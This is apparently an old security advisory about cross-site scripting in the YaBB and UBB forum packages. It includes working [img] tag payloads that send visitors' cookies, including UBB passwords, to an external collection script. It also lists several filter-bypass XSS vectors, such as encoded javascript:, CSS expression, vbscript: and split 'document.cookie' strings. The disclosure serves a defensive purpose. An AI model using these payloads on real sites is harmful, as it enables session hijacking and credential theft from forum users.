|
COMMAND YaBB and UBB SYSTEMS AFFECTED YaBB v1 Gold/SP 1 and older UBB 6.2.0 Beta Release 1.0 PROBLEM In \"Obscure^\" advisory [http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html] : When a user inserts [IMG]url[/IMG], YaBB changes that text to <img src=\'url\'>. If someone inserts javascript:alert() instead of the url, the javascript code is executed by Internet Explorer or some other web browsers. This allows stealing of cookie data and other interesting things. YaBB has filtered the javascript method, however it does not take into consideration that javascript: can be encoded using standard HTML hex and ASCII encoding. Same with UBB. In UBB I need to encode several strings because they added checking for certain keywords such as cookie. In my example I change javascript: to javascript: Exploit Inserting a new topic (or reply) with the following text will send visitor\'s cookies to Eye on Security. The output is saved to http://eyeonsecurity.net/tools/cookies.txt . Cookies will contain the password in the case of UBB and a session cookie (or encoded password) in YaBB. -- snap YaBB -- [img]javascript:document.write (\'<img src=http://eyeonsecurity.net/tools/cookie.plx?cookie=\'+escape(docu ment.cookie)+\'>\') [/img]. -- snap YaBB -- -- snap UBB -- [IMG]javascript:document.write (\'<img%20src=http://eyeonsecurity.net/tools/cookie.plx? cookie=\'+escape(document.cookie)+\'>\') [/IMG] -- snap UBB -- Update ====== Obscure added more ways to circumvent YaBB & UBB : <body onload=\"alert()\"> <link rel=\"stylesheet\" href=\"javascript:alert()\"> <p style=\"width: expression(alert())\"> (works on IE thanks to dynamic properties, executes immediately.) <img src=\"vbscript:alert\"> (javascript: is not the only potentially harmful kind of URL) <a href=\"about:<script>alert()\"> (another one for IE) <a href=&{location=\'stealcookie.cgi?\'};> (one for Netscape 4, so it doesn\'t feel left out.) All the above can be made to steal cookies - filtering the string \"document.cookie\" does no good whatsoever since one can just as well do \"document[\'coo\'+\'kie\']\". I\'m sure there are many more holes I missed. SOLUTION Check web sites, patch should be out soon : http://yabb.xnull.com http://www.infopop.com/products/ubb/